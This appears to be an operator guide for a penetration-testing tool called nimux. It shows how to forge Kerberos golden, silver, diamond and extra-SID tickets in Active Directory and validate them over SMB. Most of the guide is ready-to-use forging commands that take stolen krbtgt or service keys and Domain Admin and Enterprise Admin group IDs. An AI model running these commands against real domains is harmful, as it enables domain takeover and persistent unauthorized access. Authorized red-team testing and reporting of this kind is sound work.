Advanced Ticket Forging with nimux
A neutral operator guide to nimux golden, silver, diamond, and inter-realm ticket workflows, including SIDs, groups, duration, and validation.
Overview
Ticket forging validates the impact of key compromise. A golden ticket proves krbtgt key impact. A silver ticket proves service key impact. A diamond ticket starts from a legitimate TGT and modifies authorization data. Inter-realm tickets validate trust boundary impact.
nimux supports Kerberos forge workflows with explicit SID, groups, extra SID, duration, and output cache controls.
Golden ticket
nimux kerberos dc01.corp.local -d corp.local \
--forge golden \
--user scoped.admin \
--key <krbtgt-key> \
--sid S-1-5-21-111111111-222222222-333333333 \
--groups 512,513,518,519,520 \
--duration 4 \
--out scoped-golden.ccacheValidate with a Kerberos-backed command:
nimux smb dc01.corp.local -d corp.local -k \
--ccache scoped-golden.ccache \
--sharesSilver ticket
nimux kerberos dc01.corp.local -d corp.local \
--forge silver \
--user scoped.user \
--service cifs/server01.corp.local \
--key <service-account-key> \
--sid S-1-5-21-111111111-222222222-333333333 \
--out scoped-silver.ccacheUse the ticket only for the matching service:
nimux smb server01.corp.local -d corp.local -k \
--ccache scoped-silver.ccache \
--sharesDiamond ticket
Diamond workflows require a readable source TGT ccache.
nimux kerberos dc01.corp.local -d corp.local \
--forge diamond \
--ccache source-user.ccache \
--key <krbtgt-key> \
--sid S-1-5-21-111111111-222222222-333333333 \
--groups 512,513 \
--out scoped-diamond.ccacheExtra SID validation
Use --extra-sid only when testing a documented cross-domain or SIDHistory-style path.
nimux kerberos dc01.corp.local -d corp.local \
--forge golden \
--user scoped.user \
--key <krbtgt-key> \
--sid S-1-5-21-111111111-222222222-333333333 \
--extra-sid S-1-5-21-444444444-555555555-666666666-519 \
--out scoped-extra-sid.ccacheReporting
Ticket forging reports should name the compromised key category, ticket type, service, realm, SID, group claims, duration, validation command, and storage handling. Keep forged tickets out of screenshots unless redacted.